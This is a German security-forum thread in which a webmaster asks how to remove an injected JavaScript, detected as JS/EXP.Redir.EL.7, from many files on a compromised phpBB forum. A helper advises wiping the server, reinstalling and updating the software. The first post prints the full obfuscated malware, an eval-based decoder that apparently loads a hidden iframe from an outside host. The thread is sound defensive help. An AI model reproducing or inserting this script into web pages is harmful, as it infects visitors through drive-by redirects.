Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 10.06.2013, 19:36   #1
gecko08
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r



Moinsen,
auf einigen Webservern sind viele *.html/php/tpl/js-Dateien mit dem unten stehenden Code befallen, vermutlich der "JS/EXP.Redir.EL.7". Leider sind es so viele Dateien, dass ein manuelles Löschen des Codes praktisch unmöglich ist. Per SSH und grep/xargs/sed kann ich aber nicht den ganzen String ersetzen, bzw. löschen.

Gibt es eine Möglichkeit, den String in eine Datei zu packen und den dann in einen Befehl zu packen à la:
grep -rl "Inhalt_v_Datei" . | xargs sed -i -e 's/"Inhalt_v_Datei"/ /'

Blöderweise hat es auch ein großes Forum betroffen, welches nun natürlich erstmal off ist.
Bin für jeden kleinsten Tipp dankbar...


Code:
ATTFilter
<!--da3e94--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_76_76_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_76_76_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7b_74_70_77_75_6d_36_6b_77_75_37_7c_81_78_77_3b_7c_6d_75_78_37_7a_6d_74_69_81_36_78_70_78_2f_43_15_12_28_76_76_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_77_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_76_76_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2f_38_2f_43_15_12_28_76_76_36_7b_7c_81_74_6d_36_70_6d_71_6f_70_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_76_76_36_7b_7c_81_74_6d_36_7f_71_6c_7c_70_28_45_28_2f_39_78_80_2f_43_15_12_28_76_76_36_7b_7c_81_74_6d_36_74_6d_6e_7c_28_45_28_2f_39_78_80_2f_43_15_12_28_76_76_36_7b_7c_81_74_6d_36_7c_77_78_28_45_28_2f_39_78_80_2f_43_15_12_15_12_28_71_6e_28_30_29_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_76_76_2f_31_31_28_83_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_7f_7a_71_7c_6d_30_2f_44_6c_71_7e_28_71_6c_45_64_2f_76_76_64_2f_46_44_37_6c_71_7e_46_2f_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6f_6d_7c_4d_74_6d_75_6d_76_7c_4a_81_51_6c_30_2f_76_76_2f_31_36_69_78_78_6d_76_6c_4b_70_71_74_6c_30_76_76_31_43_15_12_28_85_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_5b_6d_7c_4b_77_77_73_71_6d_30_6b_77_77_73_71_6d_56_69_75_6d_34_6b_77_77_73_71_6d_5e_69_74_7d_6d_34_76_4c_69_81_7b_34_78_69_7c_70_31_28_83_15_12_28_7e_69_7a_28_7c_77_6c_69_81_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_7e_69_7a_28_6d_80_78_71_7a_6d_28_45_28_76_6d_7f_28_4c_69_7c_6d_30_31_43_15_12_28_71_6e_28_30_76_4c_69_81_7b_45_45_76_7d_74_74_28_84_84_28_76_4c_69_81_7b_45_45_38_31_28_76_4c_69_81_7b_45_39_43_15_12_28_6d_80_78_71_7a_6d_36_7b_6d_7c_5c_71_75_6d_30_7c_77_6c_69_81_36_6f_6d_7c_5c_71_75_6d_30_31_28_33_28_3b_3e_38_38_38_38_38_32_3a_3c_32_76_4c_69_81_7b_31_43_15_12_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_28_45_28_6b_77_77_73_71_6d_56_69_75_6d_33_2a_45_2a_33_6d_7b_6b_69_78_6d_30_6b_77_77_73_71_6d_5e_69_74_7d_6d_31_15_12_28_33_28_2a_43_6d_80_78_71_7a_6d_7b_45_2a_28_33_28_6d_80_78_71_7a_6d_36_7c_77_4f_55_5c_5b_7c_7a_71_76_6f_30_31_28_33_28_30_30_78_69_7c_70_31_28_47_28_2a_43_28_78_69_7c_70_45_2a_28_33_28_78_69_7c_70_28_42_28_2a_2a_31_43_15_12_85_15_12_6e_7d_76_6b_7c_71_77_76_28_4f_6d_7c_4b_77_77_73_71_6d_30_28_76_69_75_6d_28_31_28_83_15_12_28_7e_69_7a_28_7b_7c_69_7a_7c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_76_69_75_6d_28_33_28_2a_45_2a_28_31_43_15_12_28_7e_69_7a_28_74_6d_76_28_45_28_7b_7c_69_7a_7c_28_33_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_33_28_39_43_15_12_28_71_6e_28_30_28_30_28_29_7b_7c_69_7a_7c_28_31_28_2e_2e_15_12_28_30_28_76_69_75_6d_28_29_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_38_34_28_76_69_75_6d_36_74_6d_76_6f_7c_70_28_31_28_31_28_31_15_12_28_83_15_12_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_85_15_12_28_71_6e_28_30_28_7b_7c_69_7a_7c_28_45_45_28_35_39_28_31_28_7a_6d_7c_7d_7a_76_28_76_7d_74_74_43_15_12_28_7e_69_7a_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_71_76_6c_6d_80_57_6e_30_28_2a_43_2a_34_28_74_6d_76_28_31_43_15_12_28_71_6e_28_30_28_6d_76_6c_28_45_45_28_35_39_28_31_28_6d_76_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_74_6d_76_6f_7c_70_43_15_12_28_7a_6d_7c_7d_7a_76_28_7d_76_6d_7b_6b_69_78_6d_30_28_6c_77_6b_7d_75_6d_76_7c_36_6b_77_77_73_71_6d_36_7b_7d_6a_7b_7c_7a_71_76_6f_30_28_74_6d_76_34_28_6d_76_6c_28_31_28_31_43_15_12_85_15_12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);}</script><!--/da3e94-->
         
__________________

Alt 11.06.2013, 09:03   #2
t'john
/// Helfer-Team
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r





welches CMS bzw. Forensoft?

URL?
__________________

__________________

Alt 11.06.2013, 09:17   #3
gecko08
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r



Moiin und schon mal thx für die Aufmerksamkeit. h:

Url ist: forum.r1club.com
phpBB3.0.10
__________________
__________________

Alt 11.06.2013, 09:42   #4
t'john
/// Helfer-Team
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r



Ein einfaches ersetzen wird nicht helfen.

Wisst ihr, wie derjenige den Code eingeschleust hat?

Wahrscheinlich hat er ein Exploit benutzt, weil die Foren-Soft nicht aktuell ist.

Das einzig richtige waere: Datenbank sichern, alles vom Server loeschen.
Forensoft neu installieren. Datenbank einspielen.
__________________
Mfg, t'john
Das TB unterstützen

Alt 11.06.2013, 12:19   #5
gecko08
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r



Wir haben keine Ahnung, wie der Server kompromittiert wurde. Wahrscheinlich so wie du sagst, wegen der nicht ganz aktuellen Forensoftware.



Aber: Du hast natürlich recht und so werden wir es auch machen müssen, zumindest mit dem Forum. Die restlichen Dateien sind gesichert und müssen dann händisch gesäubert werden.

Interessanterweise wird der Schadcode nicht von Kapersky, symantec und Co gefunden. Lediglich 6 von 30 Scannern erkennen den, z.B. Avira. Merkwürdig....

Update:
Ich habe alles incl. der Datenbanken gelöscht und neu installiert. Die sql-backups hab ich nach Schadcode durchsucht und nichts gefunden, also auch aufgespielt, die Forensoft aktualisiert und bisher - toi toi toi - nix auffälliges und alles gut.

So wie es aussieht, muss der Code über die phpBB 3.0.10 gekommen sein. Mit der 3.0.11 ist dann hoffentlich alles gut.

Nochmals thx t'john für die Info und die Anteilnahme. h:

__________________

Alt 17.06.2013, 22:42   #6
gecko08
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r



Oh man, mit meinem Server hab ich nach der Säuberung Glück bisher, aber o.g. Forum hat es schon wieder erwischt. Dort wurden nicht alle Verzeichnisse gelöscht, sondern nur mit "gesäuberten" Dateien überschrieben.
Meine Webspace hab ich incl. Datenbanken kompett gelöscht und neu installiert. Scheint zu helfen.
Mittlerweile findet man aber auch viele Webseiten mit dem Script.

Einfach in der Suche mal "da3e94" eingeben.
__________________
--> JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r

Alt 17.06.2013, 23:37   #7
t'john
/// Helfer-Team
 
JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Standard

JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r



Wenn eine Luecke in einem Foren oder CMS System gefunden wurde, wird das Internet abgegrast und alles "infiziert" was sich kriegen laesst.

Das einspielen der Updates ist wirklich wichtig.
__________________
Mfg, t'john
Das TB unterstützen

Antwort

Themen zu JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r
befallen, befehl, code, codes, ersetzen, forum, großes, inhalt, js/exp.redir.el.7, löschen, möglichkeit, natürlich, praktisch, probleme, script, stehe, unmöglich, vermutlich, webseite, webseiten, webserver



Ähnliche Themen: JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r


  1. Beim surfen werden ständig Webseiten aufgerufen
    Plagegeister aller Art und deren Bekämpfung - 14.10.2015 (6)
  2. Vielen vielen Dank an deeprybka für die Hilfe beim Beseitigen meines Problems
    Lob, Kritik und Wünsche - 26.07.2014 (1)
  3. Windows 7, störende Werbeanzeigen beim aufrufen von Webseiten, Probleme bei Beseitigung
    Plagegeister aller Art und deren Bekämpfung - 12.03.2014 (5)
  4. HTML/ExpKit.Gen3 wird beim Aufrufen einiger Webseiten von Avira gefunden
    Log-Analyse und Auswertung - 27.01.2014 (15)
  5. Windows 7: Virenfund JS/Redir
    Log-Analyse und Auswertung - 20.01.2014 (14)
  6. Probleme beim öffnen von Webseiten
    Alles rund um Windows - 29.12.2013 (1)
  7. Problem beim starten: x86/Home Tab/Tb updater.dll, Modul nicht gefunden. Zusätzlich Probleme beim Herunterfahren
    Log-Analyse und Auswertung - 12.09.2013 (15)
  8. Java-Scriptvirus JS/EXP.Redir.EL.7
    Plagegeister aller Art und deren Bekämpfung - 12.06.2013 (13)
  9. JS/EXP.Redir.EL.7 alles erledigt?
    Plagegeister aller Art und deren Bekämpfung - 11.06.2013 (7)
  10. Avast includeit.info / Warnung beim besuch von Webseiten
    Plagegeister aller Art und deren Bekämpfung - 05.08.2012 (2)
  11. fifaconfig.exe Malware JS/Redir
    Mülltonne - 24.06.2012 (1)
  12. Probleme mit Windows Update, unerwünschtes Öffnen von Webseiten
    Plagegeister aller Art und deren Bekämpfung - 06.08.2011 (15)
  13. Probleme mit windows update, unerwünschtes Öffnen von Webseiten
    Antiviren-, Firewall- und andere Schutzprogramme - 13.03.2011 (13)
  14. Probleme mit Google (Weiterleitung), diversen Webseiten und Malwarebytes lässt sich nicht starten
    Plagegeister aller Art und deren Bekämpfung - 21.09.2010 (12)
  15. Massive Probleme mit bösen Javascripte Code auf meinen webseiten
    Plagegeister aller Art und deren Bekämpfung - 23.10.2009 (1)
  16. Browser verhält sich merkwürdig.Probleme beim laden von Webseiten.
    Log-Analyse und Auswertung - 23.08.2008 (8)
  17. Probleme mit Hotmail und Windows-Webseiten - Malware schuld?
    Plagegeister aller Art und deren Bekämpfung - 21.01.2008 (4)

Zum Thema JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r - Moinsen, auf einigen Webservern sind viele *.html/php/tpl/js-Dateien mit dem unten stehenden Code befallen, vermutlich der "JS/EXP.Redir.EL.7". Leider sind es so viele Dateien, dass ein manuelles Löschen des Codes praktisch unmöglich - JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r...
Archiv
Du betrachtest: JS/EXP.Redir.EL.7 auf vielen Webseiten - Probleme beim s&r auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.